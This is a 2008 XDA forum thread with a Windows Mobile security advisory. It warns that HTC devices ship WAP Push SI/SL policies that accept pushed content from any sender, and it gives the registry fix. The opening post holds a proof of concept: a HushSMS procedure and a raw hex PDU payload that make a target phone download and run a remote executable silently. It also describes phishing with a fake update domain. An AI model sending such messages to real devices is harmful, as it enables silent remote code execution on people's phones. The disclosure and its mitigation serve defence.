Attend XDA's Second Annual Developer Conference, XDA:DevCon 2014!
5,732,073 Members 40,837 Now Online
XDA Developers Android and Mobile Development Forum

[Security Advisory] Manufacturers leave device open for WAP-Push based attacks

Tip us?
 
c0rnholio
Old
(Last edited by c0rnholio; 19th September 2008 at 10:18 AM.) Reason: Additional informations added
#1  
Senior Member - OP
Thanks Meter 32
Posts: 493
Join Date: Sep 2005
Location: in the basement...
Default [Security Advisory] Manufacturers leave device open for WAP-Push based attacks

Windows Mobile Security Advisory: Manufacturers leave device open for WAP-Push based attacks
--------------------------------------------------------------------------------------------

Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted orginators. This policy is defined in the device registry. If improper settings are applied to this policy attackers can send malicious content to the device which then displays or executes the content immediately. This leaves the device open for further attack scenarios.


Workaround / Fixes:
-------------------

Open your device registry and navigate to:

HKLM\Security\Policies\Policies

Check the values of the following DWORDs:

0x0000100c
and
0x0000100d

Microsofts recommends the following values for these:

0x0000100c : 0x800

0x0000100d : 0xc00

If they are for example 0x840 and 0xc40 your device is wide open and vulnerable. Change the keys to

the Microsoft recommendation. They are effective immediately.

Proof of concept:
-----------------
For testing purposes check the above registry keys and set them to a faulty value (like the above

0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testings.
HushSMS is able to send these kind of messages from windows mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the receipient windows mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS it will then download the above sample

program and executes it immediatly without user interaction.

If you want to test your target device with PDUSpy use the follwing sample message:

UDH: 05040b8423f0

Message(hex):

DC0605B0AF82B48302066A008509037777772e73696c656e74 73657276696365732e64652f77617074657374736c2e65786

5000501

Edit: Added a youtube video in post #4


EDIT 19.09.2008:
Some clarifications

Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.

Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".

However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).

Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Donwload ist at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...

Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.

It's up to you to care about this or not since HTC doesn't seem to care.

Cheers
Current devices: N7100, N5100
Development devices: P1000, Xoom, Magic
 
tmknight
Old
#2  
tmknight's Avatar
Senior Member
Thanks Meter 24
Posts: 398
Join Date: Mar 2007
Location: Georgia
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.

From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
Device: HTC One X+ (AT&T)
Android ROM: Still Looking
Suggestion: Thank you for thoroughly searching before posting
Save a post: Please use the THANKS button when your fellow members have been helpful
 
c0rnholio
Old
#3  
Senior Member - OP
Thanks Meter 32
Posts: 493
Join Date: Sep 2005
Location: in the basement...
Quote:
Originally Posted by tmknight View Post
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.

From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
For SI you are right since the user only gets notified with an URL, but I would call it a huge whole for the SL things. SL messages get executed by the device immediately without the user having a way to block or stop this (if the message is set up accordingly; there are 3 message options as per standard and I refer to the silent execution flag).
If you are watching your device while the messages comes in you can see that a gprs connection is beeing made (if you are connected the whole time with an unlimited data plan for example you wouldnt even notice this).
Just give it try with the method I posted in the advisory with HushSMS (not advertising my program here, just giving a proof of concept).

Both advisories are made by me since I dicovered both flaws.

Cheers
Current devices: N7100, N5100
Development devices: P1000, Xoom, Magic
 
c0rnholio
Old
#4  
Senior Member - OP
Thanks Meter 32
Posts: 493
Join Date: Sep 2005
Location: in the basement...
I just made a youtube video to demonstrate what this vulnerability means.

Watch it here: http://de.youtube.com/watch?v=QhJ5SgD-bdQ
Current devices: N7100, N5100
Development devices: P1000, Xoom, Magic
 
tmknight
Old
#5  
tmknight's Avatar
Senior Member
Thanks Meter 24
Posts: 398
Join Date: Mar 2007
Location: Georgia
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).

Like I said it is good info and indeed a security risk.

Will you share from where this info came?

Cheers
Device: HTC One X+ (AT&T)
Android ROM: Still Looking
Suggestion: Thank you for thoroughly searching before posting
Save a post: Please use the THANKS button when your fellow members have been helpful
 
c0rnholio
Old
#6  
Senior Member - OP
Thanks Meter 32
Posts: 493
Join Date: Sep 2005
Location: in the basement...
Quote:
Originally Posted by tmknight View Post
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).

Like I said it is good info and indeed a security risk.

Well this is interesting. So you say you had the same faulty registry keys like the new kaiser wm 6.1 rom had? (100c and 100d set to 840 and c40)
As you may have seen in the video my IE simply did not ask to open the file. It just gets executed...
Well, then at least your IE settings saved you from getting r00ted :)

Quote:
Originally Posted by tmknight View Post
Will you share from where this info came?
This vulnerability was researched by me about 1 year ago. But the default settings for SL and SI messages was always set correct in the last ROM versions for the devices I had. I just looked at the default settings on this new kaiser rom and found that they left it open for whatever reason and so I published this advisory. I already contacted HTC and am waiting for a response.
Current devices: N7100, N5100
Development devices: P1000, Xoom, Magic
 
nolovelust
Old
#7  
nolovelust's Avatar
Senior Member
Thanks Meter 14
Posts: 296
Join Date: Dec 2005
Location: TR
hi, i've got htc raphael and values are

0x0000100c : 0x800

0x0000100d : 0x40

not
0x0000100c : 0x800

0x0000100d : 0xc00

but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.

also by changing to those suggested values do i disable my phones wappush message receive capability?

thanks
 
Desigen
Old
(Last edited by Desigen; 19th September 2008 at 09:27 AM.)
#8  
Member
Thanks Meter 0
Posts: 55
Join Date: Jul 2008
Hello,
Good day, I would like to thank you for this post about Wap Push Messages. I have a straing problem with my HTC Kaiser Windows Mobil 6.1. My device don't notify me about any WAP Push Messages. I have the 800 & c00 vales in my registry, I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.

I changed it back to Microsoft recommends and send a new message again but it didn't appear in inbox message and my cell didn't notify me about new WAP PUSH message.

I'm going crazy with this, what's the problem, can you help me ?

Regards,
 
c0rnholio
Old
#9  
Senior Member - OP
Thanks Meter 32
Posts: 493
Join Date: Sep 2005
Location: in the basement...
Quote:
Originally Posted by Desigen View Post
... I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.

I changed it back to Microsoft recommends and send a new messeage again but it didn't appear in inbox message and my cell didn't notifcate me about new WAP PUSH message.
...
I don't understand what exactly your promblem is with. If you set the Microsoft recommended values it simply tell the device which security policy to apply to wich kind of messages. In the case of the two values the settings say that WAP-Push SL & SI messages have to come from trusted push proxy gateways. If you set them to the faulty values (840&c40) the device accepts these kind of messages coming from any. If the correct (or recommended) values are set the device simply drops or discards the messages without any user notification. So your described behaviour looks normal to me.


(Note: for those who are familiar with device roles and policies, I'm not going into deep here to avoid confusion)
Current devices: N7100, N5100
Development devices: P1000, Xoom, Magic
 
Desigen
Old
#10  
Member
Thanks Meter 0
Posts: 55
Join Date: Jul 2008
Thanks for fast replay,

My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.

Thanks

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


TRENDING IN THEMER...